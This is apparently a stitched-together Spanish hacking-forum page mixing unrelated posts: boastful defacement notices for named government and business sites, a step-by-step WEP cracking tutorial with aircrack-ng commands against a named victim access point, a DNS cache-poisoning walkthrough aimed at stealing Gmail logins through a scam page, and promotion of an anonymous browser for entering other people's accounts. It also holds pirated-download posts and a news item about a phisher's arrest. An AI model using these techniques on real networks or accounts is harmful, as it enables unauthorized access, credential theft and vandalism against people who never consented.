Owned http://www.zbjsj.gov.cn/

Owned... C.I.C

[H]acked By No[F]eck [S]ecurity OFF
Cyber Inteligencia Criminal



Y]ou Are [T]he mother [F]ucker

[G]reetz:[G]othic-x - [A]gent - [N]exus

http://r3d-point.com/ Defaced By 0o_zeus_o0

0o_zeus_o0 : aun se defacear , aun defaceo a objetivos , esto es para callar un poko a la gente , 0o_zeus_o0 es papi

imagen por si dicen ke no es verdad

Pwned ????

yeahh you are pwned by 0o_zeus_o0




me costo el server , pero es para dejar ver que no solo soy un super defacer de google , tambien objetivos , tengan en cuenta que sigo siendo el mejor de todos no se me comparen porfavor no comentan errores.

greetz: a todos mis amigos en especial a mi novia :p

deface con deface se paga espero el mio

ALKON OWNED

HACKED BY Knet, Ricota & Pollo!

link: www.alkon.com.ar

asi que muevan las cachas :P

Kcho Borracho NOT DEAD

KKR Again papi
100% Argentos!!

El mejor server de Argentina

donde ? yo no lo veo...

Vamos las Putas !!!


Atentamente los SR's:

KeyNet.Security@Hotmail.com
ricota.forever@Hotmail.com


Sobala pelotin no seas Forro

Owned Canal 11

Owned by Karont3 & Red-Point

link: http://oncetv-ipn.net/dialogos/foro/listahijos.php?var=869

Karont3 & Red-Point Waz HEre!!

Ownz Ur System quiero salir de nuevo en las noticias ok? jajajajaja

tienen mas fallas de seguridad en el sitio con gusto les ayudare a arreglarlas

http://kar0nt3.co.cc/

http://r3d-point.com


METODO: HTML inyeccion

xD sin duda a red point no le basto con una entrevista, canal 11 R3d P0int puede
arreglar tantos bugs de su website
Saludos a :
R3d P0int..

Cambiar el nombre al boton inicio "xp Profecional"

Lo primero que tenemos que hacer es bajar el programa para poder cambiar el boton de inicio, el programa se llama Reshack.

DESCARGAR Reshack


Abrimos el Reshack y le ponemos File/open, despues le saldra otro cuadro y donde dice buscar en: se van a disco c y despues a la carpeta que dice windows, ahora donde dice nombre pondremos explorer.exe. y le ponen abir ejemplo:



le saldra un cuadro le ponen donde dice string table ejemplo.



Despues le saldra muchos numeros le dan clic al 37 y le saldra un archivo que dice 3082 y le dan clic le saldra esto.



ahora amigos le cambiaremos donde dice inicio como ustedes quiera que aparesca en su boton de inicio. ejemplo.



bueno aqui si le cambiare el inicio, aqui ponen lo que ustedes quieran que le aparesca en su boton de inicio yo le pondre LIR. despues de poner en donde estava inicio le dan clic a Compile Script. ejemplo:



despues que le hayan dado clic a Compile Script seban a file y le ponen guardar como (save as...) y lo guardan con nombre.exe yo lo puse LIR.exe ejemplo.



Despues se van a inicio y despues en ejecutar. y ponen regedit y aceptar. ejemplo:



Despues le saldra un cuadro le dan clic a HKEY_LOCAL_MACHINE ejemplo:



Despues le dan clic en SOFTWARE ejemplo:



Despues le dan clic en Microsoft ejemplo:



Despues le dan clic a Windows NT ejemplo:



Despues le dan click a CurrentVersion ejemplo:



Despues habren winlogon y le dan click a shell ejemplo:



ya por ultimo cuando le picas a shell te va salir un cuadro y nomas pones el nombre es decir el nombre como le pusiste al boton. yo le puse LIR.exe ejemplo:



ya de ahi reinician la computadora y les aparecera su boton con lo que le pusieron.



Por si quiere volver a poner el inicio, es muy sencillo se van a inicio
ejecutar y le ponen regedit despues seban a shell como ya saben y de ahi le cambian es decir, estudes recuerdan que a mi pc le puse de inicio LIR y entonces le puse LIR.exe ahora le vamos a cambiar
explorer.exe y listo es todo le damos aceptar y reiniciamos la computadora. ejemplo:



Resource HackerTM DESCARGA:
http://delphi.icm.edu.pl/ftp/tools/ResHack.zip

Screen de mi pc =D:

Minimanual "Crackeando una red Wifi"

Minimanual "Crackeando una red Wifi"




Bueno pues aqui les va mi primer tutorial para diosdelared, este tuto hablara sobre la funcion basica de una red wifi algunas definiciones y como poder obtener una clave wep ,NO ME HAGO RESPONSABLE DEL DANO QUE PUEDEN PROBOCAR CON ESTA INFORMACION ,USENLA PARA PROTEGER SU RED :-*(si como no..)

Me e basado en algunas definiciones que se pueden encontrar tanto como en google como en wikipedia
INICIO

INDICE
1 Informacion basica sobre WI-FI
2 Definiciones
3 Preparacion de un equipo
4 Ejemplo de un Ataque a un AP y obtener la clave wep
5 FIN



1 Informacion basica sobre WI-FI
Primero antes que nada dare una breve explicaciones de que es wifi y algunos de sus estandares y su Seguridad

WI-FI Estandar IEEE802.11:

IEEE802.11b y 802.11g
Estos estandares disfrutan de una aceptación internacional debido a que la banda de 2.4 GHz está disponible casi universalmente, con una velocidad de hasta 11 Mbps y 54Mbps.

IEEE802.11a
con el nombre de WIFI5 que opera a 5 GHz y que disfruta de una operatividad con canales relativamente limpios. La banda de 5 GHz ha sido recientemente habilitada y, además no existen otras tecnologías (Bluetooth, microondas, ZigBee, WUSB) que la estén utilizando, por lo tanto existen muy pocas interferencias. Su alcance es algo menor que el de los estándares que trabajan a 2.4 GHz (aproximadamente un 10%), debido a que la frecuencia es mayor. (a mayor frecuencia, menor alcance).

IEEE 802.11n
Trabaja a 2.4 GHz a una velocidad de 108 Mbps. Sin embargo, el estándar 802.11g es capaz de alcanzar ya transferencias a 108 Mbps, gracias a diversas técnicas de aceleramiento. Actualmente existen ciertos dispositivos que permiten utilizar esta tecnología, denominados Pre-N.

Seguridad:


Actualmente existen tipos de protocolo para el estandar WI-FI que manejan informacion cifrada ,los mas usados son WEP y WAP

WEP:(Wired Equivalent Privacy),este cifra los datos de una red de forma que el destinario que hizo la peticion reciba la informacion .Maneja encriptaciones de 64bits ,128bits y los dispositivos nuevos manejan 256bits,WEP codifica los datos con una "clave"que le fue asignada ,antes de enviar los datos al destinatario.

WAP:presenta mejoras como generación dinámica de la clave de acceso. Las claves se insertan como de dígitos alfanuméricos, sin restricción de longitud

WPA2:Es una mejora del protocolo WPA,para los estandares 802.11g que trae casi todas las mejor del WPA ,este usa cifrado AES (Advanced Encryption Standard),actualmente WPA2 es el mas"seguro" de las encriptacion protocolos de las redes WI-FI.

Otro tipo de seguridad de una red WI-FI
Autoindentifcacion VPN: En este caso puede ser mediantes la autenticacion o autorizacion de usuarios.

Filtracion de Mac:Solo permite acceso ala red aquellos dispositivos registrados.

Ocultar el ESSID o punto de acceso:
Se puede ocultar el nombre del punto de acceso (router)de manera que sea invisible y tenga que ser registrado manualmente.

esto fueron algo breve sobre como trasmite de los estandares y los protocolos que usa WI-FI

2 DEFINICIONES

Pronde algunas de las definiciones para los que andan un poco perdidos entre tantos tecnisismos xD

*WI-FI:Fidelidad Inalambrica(Wireless Fidelity)
*IEEE:Instituto de Ingenieros Eléctricos y Electrónicos(The Institute of Electrical and Electronics Engineers)
*AP:Punto de Acceso(Access Point)
*Mbps:Megabits por Segundo
*Protocolo: es el conjunto de reglas que especifican el intercambio de datos u órdenes durante la comunicación entre las entidades que forman parte de una red
*WEP:Privacidad Equivalente a Cableado(Wired Equivalent Privacy)
*WPA:Proteccion de Acceso por WI-FI
*Direccion Mac: dirección de control de acceso al medio (Medium Access Control address)

---
*Live-CD:CD en vivo , es un disco que puede ser booteado y usado desde el mismo cd sin ser instalado ,todo se ejecuta desde la la lectora y la memoria ram , la desventaja es que no se podran guardar los cambios realizados.
*DHCP:Protocolo de Configuración Dinámica del Host


bueno , esas fueron alguna de las definiciones mas comunes,que se usan en las redes wifi.


3 PREPARACION
Ahora prepararemos nuestro equipo para instalar las herramientas , antes que nada ,le recomiendo que esto lo hagan en linux , porque les digo esto , porque las targetas wireless son mas compatibles y las herramientas y los drivers para linux estan mas obtimizadas y actualisados que en Win.

En caso de no contar con algun sistema GNU/LINUX ,hay varios LIVE-CD listo y preparados para auditoria wireless, con los driver y las herramientas ya instaladas,se pueden usar tanto como en un cd-rom com en un Pendriver o memoria usb.como no nos gusta complicarnos la vida y batallar en configurar la targeta,instalar los driver,instalar los programas y verificar si funciona correctamente usaremos un algun live cd ya preparado xD
los mas recomendados son:

WIFISLAX

"Wifislax esta basado básicamente y principalmente en SLAX (basado en la distribución Slackware Linux), pero debido al gran trabajo realizado por los autores del BackTrack hemos trabajado directamente sobre este ultimo live CD, así pues catalogar al Wifislax como una live CD podría incluso considerarse como erróneo. También están disponibles todos los scripts y códigos fuente, los cuales pueden ser utilizados para construir tu propio live CD."

Pagina Oficial: www.wifislax.com

Descarga Version 3.1

Backtrack



Backtrack es uno de las mas valoradas distribuciónes linux live centrado en las pruebas de penetración. Sin instalación alguna, la plataforma de análisis se inicia directamente desde el CD-Rom y es totalmente accesible y usable en cuestión de minutos.

Pagina Oficial: http://www.remote-exploit.org/backtrack.html

Descarga version 3.0



esa son algunas de las distribuciones mas usadas, claro que que hay mas pero solo pongo esas porque son las que tienen mas soporte.

La que use yo fue wifislax porque , por el simple hecho de que las personas que hacen wifislax ,hablan en espanol y es mas facil familiarizarse con este distro.




4 Ejemplo de un Ataque a un AP y obtener la clave wep

Bueno ahora manos a la obra , aremos un ataque simple de falsa autentificación por no tener clientes conectados,despues asociacion ,sigue con reinyeccion de trafico y ataque "chopchop".

Yo usare para este ejemplo una targeta PCIMCIA model a5006eg chipset atheros ,cabe recalcar que no todas las targetas wireles tienen el mismo resultado y algunas no son compatibles.

Bueno ahora sabemos lo que haremos , bien seguimos con bootear nuestro live-cd yo en mi caso usare wifislax 3.1 ,bueno en caso de que no sepas solo entras ala BIOS de tu pc y pones como primer arranque tu lectora,en caso que surga un problema al bootear o se congele el ordenador al cargar el live-cd ,puede que tenga un problema al detectar una parte de nuestro hardware ,bien entonces si te sucede necesitas agregar un comando llamado "cheatcode"en el menu de inicio de wifislax
pagina de lista de cheatcodes:http://wifislax.com/manuales/cheatcode.php


Ahora bien ya que nos pida identificarno (user y pass) nos logueamos como root

Código:
user:root
pass:toor
y acontinuacion escribes
Código:
startx
se abrira una interfaz grafica

Bien , tendremos nuestro sistema wifislax cargado en nuestra pc , ahora sigue un paso importante , verificar que nuestra targeta wireles aya sido detectada , para eso abrimos la consola y tecleamos

Código:
iwconfig
bueno en la shell aparece que mi targeta

me aparesera como "ath0" ese sera el nombre del interfaz de mi targeta


ahora seguimos con activarla en modo monitor nuestra targeta, en mi caso por usar una targeta con chipset atheros sigo esta ruta



ya que mi targeta tiene chipset atheros
o si no escribe

Código:
iwconfig interfaz mode monitor
(iwconfig ath0 mode monitor)


ahora tenemos que cambiar nuestra direccion mac para que sea mas facil a la hora de identificarla o que no nos metamos en problemas xD ,primero tenemos que dejar modo bajo o desactivada para poder cambiar la mac por una que le asignemos ahora escribe esto en la terminal:

Código:
ifconfig interfaz down
(ifconfig ath0 down)

ahora cambiaremos la mac nuestra por otra :

Código:
macchanger -m XX:XX:XX:XX:XX:XX interfaz
(macchanger -m 00:11:22:33:44:55 ath0)

ahora volvemos a subir o activar nuestra targeta

Código:
ifconfig interfaz up
(ifconfig ath0 up)


bueno ahora seguimos ,tenemos que buscar un AP como "victima" , aqui en Mexico la mayoria de la gente cuenta con INFINITUM , que al contratar les dan un router preconfigurado con una simple clave de 64 bits ,y unos de los mas faciles de reventar :P

Si tienes la mac y el ESSID de la victima puedes saltarte este paso ,si no escribe este comando en la shell, hay muchas formas de obtener la mac o essid de un AP , yo personalmente uso este por que me da ,todo la info ,como el canal,el nombre,que encriptacion tiene,direccion mac y los clientes que tiene conectado.

Código:
airodump-n interfaz
(airodump-ng ath0)


bien ahorita ya tenemos el nombre , la mac y el canal del AP ,ahora podemos cerrar la ventana


ahora tenemos que "capturar" todo lo que entra y sale de esa red , pero como bien dije en este caso este AP no cuenta con clientes conectado , entonces intentaremos asociarnos

primero escribimos:

Código:
airodump-ng -w dato_a_reconoser -c canal
(airodump-ng -w victima -c 2)



con eso estaremos guardando todo en victima.cap donde se almacenara los data
bien ahora nos asociaremos con el AP , por no haber clientes conectados , SIN CERRAR LA OTRA VENTANA ABRIMOS OTRA y escribimos.

Código:
aireplay-ng -1 0 -e ESSID_victima -a mac_victima -h tu_mac interfaz
(aireplay-ng -1 0 -e INFINITUM7203 -a 00:1E:C7:8A:25:89 -h 00:11:22:33:44:55 ath0)



bueno , en caso de suelte un mensaje que no se puede asociar puede ser poque ,el AP tiene filtro de mac o estas muy lejos o algun dato no esta correcto .con eso ya obtendremos data pero de una forma muy lenta entonces reinyectaremos trafico y asi poder obter datas mas rapido, entonces escribimos:
Código:
aireplay-ng -3 -b mac_victima -h tu_mac interfaz
(aireplay-ng -3 -b 00:1E:C7:8A:25:89 -h 00:11:22:33:44:55 ath0)

entonces estaremos obteniendo datas mas rapido(en mi caso de 300 a 400/Segundo) ,ahora solo queda esperar , por lo regular yo espero a 20,000 datas para pasarlo por aircrack despues de ahi lo intento cada 5,000

bueno ahora aremos el ataque chopchop xD, escribimos en la terminal

Código:
aircrack-ptw -z dato_a_reconoser.cap
(aircrack-ptw - victima-01.cap)
y BINGOO!

por lo regular con 18mil se obtiene la clave wep de 64bits y con 48mil datas se obtienen las de 128bits
bueno en caso de que no la encuentre seguimos y probado cuando sume los sig. 5000 , hasta encontrarla nos soltara la clave en HEX y ASCCI.:P

y ahora a conectarse!, ahi ya es cosas de ustedes lo que haran , con este concluyo este minimanual creado por c0d3 para diosdelared. parte de la informacion fue sacada de wiki ;D
5 FIN
Se aceptan sugerencia , y son libres de copiar y pegar , pero con los creditos xD y espero que les haya servido y aunque solo a 1 le funciones con eso me conforme , no soy un experto en el tema pero en lo que este a mi alcanse les ayudos -.-

Se pintan casas a domicilio??



yo que pensaba llevarle mi casa para que la pinte U_U

Nokia 1100 Vs Iphone

Detenido phisher rumano por estafar 700.000 dólares

Detenido phisher rumano por estafar 700.000 dólares


El estafador cibernético fue extraditado a EE.UU desde España.



Sophos ha informado de la detención de un phisher rumano de 22 años, acusado de robar 700.000 dólares de unas 7.000 personas

El método utilizado por Sergio Daniel Popa, que así se llama el ciberdelincuente, fue a través de ataques de phishing con envíos masivos de correos electrónicos y supuestamente remitidos por entidades financieras, incluyendo PayPal y Citibank. Ahora se enfrenta a 10 años de cárcel y una multa de 500.000 dólares.

Según fuentes, redirigía a sus víctimas llevándoles a sitios web falsos y les engañaba para que revelaran datos personales, tales como el número PIN, nombre, dirección, cuenta bancaria y números de tarjetas de crédito o de la seguridad social. En definitiva, datos que podía usar para su propio beneficio económico.

“Las autoridades han realizado un gran trabajo con este caso llevando a Popa a enfrentarse ante un tribunal", afirma Graham Cluley, Consultor de tecnología de Sophos. “Tristemente, todavía existen muchos otros criminales que se aprovechan de inocentes usuarios de Internet a los que le roban su identidad por su imprudencia".

Según ciertas informaciones, Popa también vendía “phishing kits" con instrucciones de cómo falsificar tarjetas de crédito. Expertos de Sophos ven cómo este ciberdelincuente tiene una alta opinión de su posición dentro del hampa criminal, tal y como se evidencia en un correo electrónico que envió a un socio en enero de 2005:

“Escuche con atención, soy un acreditado [sic] profesional del hampa. He realizado numerosas estafas e información de tarjetas de crédito. Puedo también conseguir créditos y dinero en efectivo de cajeros automáticos. Cobro por mis servicios, pero soy un gran proveedor de todo".


fuente:
http://diarioti.com/gate/n.php?id=19804

Acunetix.Web.Vulnerability.Scanner.v5.1

¿Es su Web site hackable? Acunetix Web Vulnerability Scanner explora automáticamente sus usos/Web site (carros de compras, formas, contenido dinámico, etc.) de la tela para las vulnerabilidades a la inyección del SQL, sitio cruzado scripting, el cortar de Google y otros ataques de la tela. Los hackers están concentrando sus esfuerzos en Web site: ¡los 75% de ataques del cyber se lanzan en usos de la tela! ¡Explore su Web site hoy y las vulnerabilidades del hallazgo antes de que lo hagan los hackers!

DESCARGA

Tienes seguridad en internet??

10 puntos para saver si tienes seguridad en internet

1) ¿Usa cortafuegos?

2) ¿Está al día con las actualizaciones automáticas de Windows Update?

3) ¿Entra periódicamente en la página de WindowsUpdate a revisar su situación?

4) ¿Usa un usuario Normal, no Administrador para cualquier conexión a Internet?

5) ¿Borra directamente todos los mensajes con ficheros adjuntos que no sean de datos?

6) Nunca ejecuta software dudoso. Es decir, todo el software instalado es con los CD's originales del fabricante o con las actualizaciones de su propia página web.

7) Si una determinada funcionalidad requiere configurar el cortafuegos, ¿se informa de cómo hacerlo en vez de desactivarlo?

8) Si usa herramientas de Office ¿tiene desactivado el Usar macros automáticamente?. Si no lo ha reconfigurado, éste es el valor por defecto.

9) Nunca uso herramientas P2P como Kazaa, eMule o eDonkey.

10) Procuro usar un antivirus actualizado a pesar que soy consciente que nunca me salvará de los virus nuevos.


Con un total de 10 puntos...si estarias seguro.A menos puntos menos seguridad tendrás.

by: Xoptik

Genitallica Discografia.


La discografia de Genitallica, banda mexicana que fusiona Punk, Rock, Ska, Hip Hop, Mariachi, Reggae y demases..

Integrantes:

Beno - Lic. Benito Alberto Martinez De La Garza
Antulio - Lic. Antulio Enrique Espinosa Gonzalez
Andres - Lic. Andres Alejandro Saenz Cantú
Gil - Gildardo González Montemayor
Gallo -Arq. Gerardo Antonio Olivares Saro

Discografía:

Picas O Platicas (2000)


tracklist:
01. Fizbe Para Todos
02. Todos Tomados
03. Capitán Peligro
04. Imagina
05. Chiquitita
06. Brigitte (Flojita Y Cooperando)
07. Mi Amigo
08. El Vato
09. Pohs'
10. Super Mal
11. (...Det Var Skibet!)(...Det Var Skibet!)
12. Zorra
13. ¿Por Qué Niño Por Qué?
14. ¿Qué Fue Lo Que Pasó?
15. Paz-Zone
16. Quiero Paz
17. El Distribuidor
18. Super Genital
19. Mi THC

DESCARGA AQUI

Sin Vaselina (2002)


tracklist.
01. Préndelo
02. Sin Semilla
03. Borracho
04. Otra Vez
05. 18 Pack
06. Después
07. El Tiempo
08. Funeral Reggae
09. Trasero
10. Preséntamela
11. No Tengo Amigos
12. Hasta Morir
13. El Perro De Mi Primo
14. No Digo Nada
15. Vale Verga
16. Sadomasoquista
17. Piensa Diferente
18. Hacerlo Bien

DESCARGA AQUI

Consexcuencias (2005)



tracklist:
01. Aa
02. Dicen Que Soy
03. Teléfono
04. Lástima
05. Ya Nada Es Igual
06. Una Noche Más
07. Cuando Me Veas Venir
08. Tócate
09. Pensándolo Bien
10. Muertos Pero Contentos
11. El Burro Sin Mecate (con Grupo Marrano)
12. Trasero (con Banda El Recodo)

DESCARGA AQUI

Pohtoshop portable


para aquellos diseñadores que luego van a cyber y no tienen photoshop instalado esta es la mejor opcion =D Photoshop Portable sele pueden agregar brushes, y demas plug's

Servidor RS:
DESCARGA AQUI

XeroBank Browser (Navegador Anonimo)

XeroBank Browser o xB Browser es un navegador open source basado en Firefox que aclama ser el mas seguro a la hora de proteger la privacidad del usuario. Utiliza dos redes de anonimato, TOR y XeroBank, convinandolo con algunas extensiones del Firefox como NoScript y Adblock asegura una navegación completamente anónima con conexiones encriptadas y seguras, tiene la característica de no dejar ningún rastro de su uso en nuestra PC.



usando un ordenador se conecta a la red comparte información sobre la dirección que está siendo utilizada por el usuario, esto es así para que los pedidos de información sean realizados de manera correcta, como así también el intercambio de certificados, etc.
Pero la red Tor intenta detener el tráfico de información que se realiza. Para ello lo primero que hace es encriptar el tráfico entre el ordenador y la red de routers de Tor. Esto hace que sea mucho mas difícil espiar a los usuarios que utilizan xBrowser. Luego, la red de Tor cambia de manera regular la dirección IP de los usuarios, lo que hace casi imposible que estos puedan ser ubicados.
Algunas de Las ventajas de xB Browser son:
-Navega totalmente anonimo
-Mejora muchisimo la seguridad
-Cambia automaticamente la IP o con un simple click
-No deja rastros en la pc donde se utilizo
-Es Open source
-Es portable
-No requiere configuración ni instalación

Obiamente el navegador tiene sus desventajas:
-Es muuchooo mas lento que el firefox normal
-No permite entrar en algunas webs
-No permite ejecutar firefox al mismo tiempo

En fin.. un programa muy util para tener en la pc y en el pendrive siempre, puede ser utilizado para miles de actividades, por ejemplo para ingresar a una cuenta de correo de otra persona o cualquier tipo de cuenta que no sea nuestra (sera casi imposible que nos descubran), para descargar de webs como rapidshare o megaupload. Para testear cuentas de ciertas webs, antes de ingresar desde su correspondiente pais y realizar "acciones" (solo para entendidos $ jaja), para ingresar en alguna web bloqueada en cierta pc o red de trabajo, para ingresar en webs en una red wi fi no segura, y un largo etc.

Tambien hay que tener en cuenta que es portable, se lo puede guardar en un pendrive o mp3 y llevarlo a un ciber cafe o al trabajo y navegar seguros y anonimos.

Para usar el programa se bajan el instalador y lo instalan, deben seleccionan la red TOR, despues lo pueden mover directamente a su pendrive, para usarlo desde otra pc.

Descarga:
web oficial.

Owned http://www.consejodeseguridad.gob.mx/index.html

Owned... C.I.C

[H]acked By No[F]eck [S]ecurity OFF
Cyber Inteligencia Criminal

link: http://www.consejodeseguridad.gob.mx/index.html


[Y]ou Are [T]he mother [F]ucker

[G]reetz:[G]othic-x - [A]gent - [N]exus

Owned http://www.stadtfriseur.at/

Owned... C.I.C

[H]acked By No[F]eck [S]ecurity OFF
Cyber Inteligencia Criminal

link: http://www.stadtfriseur.at/



[Y]ou Are [T]he mother [F]ucker

[G]reetz:[G]othic-x - [A]gent - [N]exus


DNS Poison "El verdadero arte" by MurdeR

----------------------------------------
~= DNS Poison & Spoof by MurdeR =~
----------------------------------------
Para el foro: www.diosdelared.com
----------------------------------------
"La potencia sin control no sirve de nada"
----------------------------------------


~~~~~~~~~~~~~~~~~~~~~~~~~~
Intro:
~~~~~~~~~~~~~~~~~~~~~~~~~~


Muchos me han preguntado que es en realidad el DNS Poisoning, si editar el hosts de windows es envenenar los dns, y la gran mayoría ha admitido no saber bien que es y en qué consiste esta tecnica.

Entre la diversidad de ataques orientados a suplantar una IP de un dominio por otra, la gran mayoría apuntan directamente al DNS server. Como ya sabrán el DNS Server es el ecargado de traducir los dominios a IPs o viceversa, por lo tanto si podemos suplantar o evenenar el dns server primario de una maquina, tendremos total control sobre lo que dicha maquina ve como resultado a su petición.

La utilidad de suplantar o envenenar un dns server puede ser muy variada, puede servir para robar datos de login y así poder controlar el panel de administración de la "victima", puede servir para robar datos sensibles y así conseguir dinerito extra, puede servir para muchisimas cosas y en todos los casos cosas malas xD

La diferencia principal entre el DNS Poisoning y la sustitución de dns en la "victima" es que NO necesitamos utilizar un virus para infectar la maquina "victima" y así nos evitamos las complicaciones de la ingeniería social, los antivirus, programar un code, etc.

Ya que el pete de reberto se niega a aprender-.- les hago un tuto intentando explicar bien que es y como efecutar DNS Caché Poison y DNS ID Spoof.
Aclaro que esto no es una guía paso a paso de como efectuar el ataque, si diré cuales son las herramientas y cual es el metodo del ataque, pero ustedes mismos deberán aprender a usar las herramientas y a efectuar el ataque.

~~~~~~~~~~~~~~~~~~~~~~~~~~
Funcionamiento de los DNS Servers:
~~~~~~~~~~~~~~~~~~~~~~~~~~


Primero y muy importante es comprender como funcionan los servidores de DNS y para esto no queda otra que la teoría, la cual haré lo más amena posible con ejemplos tontos de los mios :P

-DE DOMINIO A IP-
Como sabran en internet todas las maquinas conectadas se comunican entre ellas por la IP, es obvio esto pero es importante tenerlo claro. Cuando escribimos en el navegador www.google.com, nuestra maquina le pedirá a nuestro DNS Server (el que seguramente nos proporciona el ISP) la IP de google.com, este al no saber cual es la IP (pq no puede almacenar todas las IPS de todos los dominios), "leerá" la configuración de google.com y de allí obtendrá cual es el DNS server responsable de dicho dominio (similar a cuando hacemos un whois), en segundo paso contactará a dicho server y le preguntará cual es la IP de google.com, al recibir respuesta nos conectaremos directamente a la IP.

[Pepe] --> cual es la ip de google? --> [DNS de Pepe]
[DNS de Pepe] --> cual es el dns server de google.com --> [whois server]
[DNS de Pepe] <-- el server de google.com es "[DNS de google.com]" <-- [whois server]
[DNS de Pepe] --> cual es la ip de google? --> [DNS de google.com]
[DNS de Pepe] <-- la ip de google es 64.x.x.x <-- [DNS de google.com]
[Pepe] <-- la ip de google es 64.x.x.x <-- [DNS de Pepe]
[Pepe] --> mostrame google.com --> [64.x.x.x]
[Pepe] <-- tomá google.com <-- [64.x.x.x]

Con ejemplo debería quedar claro como funciona más o menos y sin muchos tecnisismos todo el temita :P


-SOBRE LA AUTORIDAD-

Se denomina DNS autoritario a los servidores que tienen "permiso" para resolver directamente (sin preguntarle a otro dns server) determinado dominio. Es importante saber esto pq si hacemos un DNS trucho que se crea autoritario y que responda por el dominio a "atacar" o bien spoofeamos unas cabeceras para atender una respuesta que le hicieron a otro server podremos suplantar a dicho dominio.
El DNS trucho autoritario es el que se usa normalmente en la tecnica "True poison" que en realidad no es más que la suplantación mediante virus del dns server de una maquina concreta.


-SOBRE LA CACHÉ-


Para no estar haciendo todo el lio anteriormente explicado, ya que pepe y muchisimas otras personas visitan con frecuencia google.com, el dns de pepe tiene una cosita que se llama caché, que es una especie de base de datos propia en la que puede guardar las ips a las que apuntan determinados dominios, esta caché está configurada para actualizarce cada determinado tiempo.. en algunos servidores cada media hora, en otros cada 12 horas y en otros cada 24 horas... incluso más.
Ya se van haciendo una idea de como va el caché poisoning, si nos topamos con que determinado dns no tiene almacenado nada relativo a un dominio en concreto y conseguimos engañarlo... tendremos un buen margen de tiempo envenenada la caché con una resolución falsa :P

-SOBRE EL ZONE TRANSFER-

Otra cosa importante que hay que saber es que es y para que sirve el Zone Transfer, basicamente el zone transfer consiste en que cuando un server le pregunta a otro, que es se supone autoridad de determinado dominio, cual es la ip de ese determinado dominio el segundo le devolverá la ip de ese dominio más un monton de otros dominios de los cuales es autoridad, de esta forma quedan almacenado en la caché del primero todos los dominios de los que el segundo es autoridad. Ya es liante así explicado, mejor veamoslo en el ejemplo de pepe, centrmonos en lo remarcado en negrita:

[Pepe] --> cual es la ip de google? --> [DNS de Pepe]
[DNS de Pepe] --> cual es el dns server de google.com --> [whois server]
[DNS de Pepe] <-- el server de google.com es "[DNS de google.com]" <-- [whois server]
[DNS de Pepe] --> cual es la ip de google? --> [DNS de google.com]
[DNS de Pepe] <-- la ip de google es 64.x.x.x & la ip de google.es es 65.x.x.x & la ip de google.uk es 67.x.x.x<-- [DNS de google.com]

[Pepe] <-- la ip de google es 64.x.x.x <-- [DNS de Pepe]
[Pepe] --> mostrame google.com --> [64.x.x.x]
[Pepe] <-- tomá google.com <-- [64.x.x.x]

Como verán el dns de pepe solo preguntó por la ip de google.com, sin embargo el dns de google le respondio con la ip de google.com y de todos los demás dominios sobre los que es autoridad. Automaticamente el dns de pepe guardará esos datos en su caché por si alguien le pregunta por ellos.


~~~~~~~~~~~~~~~~~~~~~~~~~~
1º Ataque: DNS Caché Poison
~~~~~~~~~~~~~~~~~~~~~~~~~~


Recordando la teoría sobre el caché y el zone transfer paso directamente a explicar un ataque con el ejemplo de Pepe y su enemigo un hacker malo llamado Zer0 z0orG xD

Zer0 z0orG que se lleva muy mal con pepe decide ownearle su correo electronico gmail para despues robarle su dominio y borrarle la página.. primero intenta enviandole un troyano pero no cuela pq pepe usa nod32 full update :P
Entonces Zer0 z0orG decide sacar a relucir sus amplios conocimientos de juanking y efecutar un ataque directo al dns server de Pepe. Para el que pregunte como carajo sabe cual es el dns server de pepe... sabe que pepe usa telefonica como isp y telefonica solo tiene 2 dns servers uno primario y uno secundario para sus clientes.

Requisitos para el ataque:
Un servidor dedicado (su pc pedorro con debian instalado).
Un dominio (hackermalo.com).
Un dns server instalado en el dedicado (bind9).


Primer paso: -Configurar un dominio-
Para que funcione este ataque Zer0 z0orG necesita configurar su dominio para que tenga como autoridad al dns server que instalará en su servidor.
Para ello simplemente se va a godaddy.com (donde compró el dominio) y en DNS Configuration cambia la IP del dns primario por la de su servidor.

Segundo paso: -Instalar y hackear el DNS Server-
El siguiente paso es hacer un apt-get install bind9 y "hackearlo", digo hackearlo pq el tiene que configurar las zonas del dns server recien instalado de modo que se sepa autoridad sobre hackermalo.com, eso es logico, pero además debe configurar un zone para gmail.com y debe también hacer que se "crea" autoridad sobre dicho dominio.
Para el que no tenga ni idea de como va este tema, busquen un tuto sobre configuración de bind :P

Tecer paso: -Server web y Scam-
Ahora Zer0 hace un scam de gmail.con, lo monta en el htdocs de apache y configura el http.conf para que apunte gmail.com a htdocs/gmail-scam/
*Para el que no sabe que shit es un scam: http://www.diosdelared.com/index.php?topic=1451.0

Ultimo paso: -El ataque!-
Ahora Zer0 z0orG entra en su laptop con Windows Vista Home Edition y configura las conexiones de red modificando la parte de DNS Server y mete como primario a "[DNS de pepe]".
Una vez hecho lo anterior lo unico que resta es entrar a hackermalo.com y esperar que la magia suceda.


Y que sucede?

[Zer0 z0orG] --> cual es la ip de hackermalo.com? --> [DNS de Pepe]
[DNS de Pepe] --> cual es el dns server de hackermalo.com --> [whois server]
[DNS de Pepe] <-- el server de hackermalo.com es "[DNS de Zer0 z0orG]" <-- [whois server]
[DNS de Pepe] --> cual es la ip de hackermalo.com? --> [DNS de Zer0 z0orG]
[DNS de Pepe] <-- la ip de hackermalo.com es 192.x.x.x & la ip de gmail.com es 192.x.x.x<-- [DNS de Zer0 z0orG]

[Zer0 z0orG] <-- la ip de hackermalo.com es192.x.x.x <-- [DNS de Zer0 z0orG]
[Zer0 z0orG] --> mostrame hackermalo.com --> [192.x.x.x]
[Zer0 z0orG] <-- tomá hackermalo.com <-- [192.x.x.x]

¡¡¡CACHé ENVENENADA!!! (en teoría si es vulnerable :P)

Y minutos más tarde...


[Pepe] --> cual es la ip de gmail.com? --> [DNS de Pepe]
[DNS de Pepe] mira en su caché y encuentra gmail, obviamente con la IP falsa que le devolvió el [DNS de Zer0 z0orG]
[Pepe] <-- la ip de gmail.com es 192.x.x.x <-- [DNS de Pepe]
[Pepe] --> mostrame gmail.com --> [192.x.x.x]
[Pepe] <-- tomá scam de gmail !! OWNED <-- [192.x.x.x]

~~~~~~~~~~~~~~~~~~~~~~~~~~
Ataque 2: DNS ID Spoofing
~~~~~~~~~~~~~~~~~~~~~~~~~~

En caso de que estemos en la misma red local que [Pepe] o que el [DNS de Pepe] no es necesario realmente armar todo el bardo, es suficiente con efectuar un man in the middle y ponerse a spoofear. No transmitir los mensajes desde el dns de pepe o bien el dns autoritario le envien a pepe o al dns de pepe y falsearlos..

